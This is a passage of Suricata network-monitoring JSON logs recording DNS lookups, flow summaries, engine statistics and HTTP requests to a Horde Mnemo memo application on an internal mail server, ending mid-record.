{"timestamp":"2020-02-29T00:05:42.416658+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:42.586343+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:05:42.651930+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:05:42.653306+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581}} {"timestamp":"2020-02-29T00:05:43.000219+0000","event_type":"stats","stats":{"uptime":13995,"capture":{"kernel_packets":133501,"kernel_drops":0},"decoder":{"pkts":133501,"bytes":92407996,"invalid":181,"ipv4":132056,"ipv6":8,"ethernet":133501,"raw":0,"null":0,"sll":0,"tcp":126963,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"ale
rt":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2684,"new_pruned":15,"est_pruned":2272,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":79941,"memcap":0}}} {"timestamp":"2020-02-29T00:05:43.001130+0000","flow_id":370778783283435,"event_type":"flow","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:42.391403+0000","end":"2020-02-29T00:00:42.497019+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:45.000426+0000","flow_id":2022601730571069,"event_type":"flow","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.604989+0000","end":"2020-02-29T00:00:44.710471+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:46.007700+0000","flow_id":1186461792399658,"event_type":"flow","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.913706+0000","end":"2020-02-29T00:00:45.019117+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:05:47.000249+0000","flow_id":2122532734704388,"event_type":"flow","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:45.989956+0000","end":"2020-02-29T00:00:46.095007+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.001105+0000","flow_id":1206437685387358,"event_type":"flow","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:46.155742+0000","end":"2020-02-29T00:00:46.261061+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.656994+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/memo.js","state":"CLOSED","stored":false,"size":1565,"tx_id":1}} 
{"timestamp":"2020-02-29T00:05:50.005989+0000","event_type":"stats","stats":{"uptime":14002,"capture":{"kernel_packets":133527,"kernel_drops":0},"decoder":{"pkts":133528,"bytes":92417809,"invalid":181,"ipv4":132081,"ipv6":8,"ethernet":133528,"raw":0,"null":0,"sll":0,"tcp":126986,"udp":4900,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2704,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2720,"synack":2711,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1747,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2234,"failed_udp":110},"tx":{"http":4531,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2311}},"flow_mgr":{"closed_pruned":2685,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21827,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} 
{"timestamp":"2020-02-29T00:05:51.000750+0000","flow_id":2068106924568790,"event_type":"flow","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1517,"bytes_toclient":6243,"start":"2020-02-29T00:04:40.307414+0000","end":"2020-02-29T00:04:50.024265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:52.601288+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16280,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} {"timestamp":"2020-02-29T00:05:56.666157+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} 
{"timestamp":"2020-02-29T00:05:56.679058+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51727,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:05:56.863955+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14745,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:05:57.000120+0000","event_type":"stats","stats":{"uptime":14009,"capture":{"kernel_packets":133531,"kernel_drops":0},"decoder":{"pkts":133537,"bytes":92419642,"invalid":181,"ipv4":132090,"ipv6":8,"ethernet":133537,"raw":0,"null":0,"sll":0,"tcp":126993,"udp":4902,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2235,"failed_udp":110},"tx":{"http":4532,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2312}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":51120,"memcap":0}}} 
{"timestamp":"2020-02-29T00:05:57.055887+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388}} {"timestamp":"2020-02-29T00:06:02.060739+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":26117,"tx_id":2}} 
{"timestamp":"2020-02-29T00:06:04.000168+0000","event_type":"stats","stats":{"uptime":14016,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:10.000595+0000","flow_id":1750343770728430,"event_type":"flow","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":1067,"start":"2020-02-29T00:05:04.223214+0000","end":"2020-02-29T00:05:09.228332+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:10.001033+0000","flow_id":1969571786109511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":24,"bytes_toserver":4346,"bytes_toclient":20355,"start":"2020-02-29T00:04:59.373319+0000","end":"2020-02-29T00:05:09.312383+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:06:11.000176+0000","event_type":"stats","stats":{"uptime":14023,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:13.000304+0000","flow_id":579007405056244,"event_type":"flow","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7102,"start":"2020-02-29T00:05:07.352500+0000","end":"2020-02-29T00:05:12.708945+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:14.005733+0000","flow_id":1227397127562127,"event_type":"flow","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:13.484239+0000","end":"2020-02-29T00:01:13.598172+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:17.000973+0000","flow_id":413775703090290,"event_type":"flow","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:16.894066+0000","end":"2020-02-29T00:01:16.999282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:06:18.000275+0000","event_type":"stats","stats":{"uptime":14030,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2689,"new_pruned":15,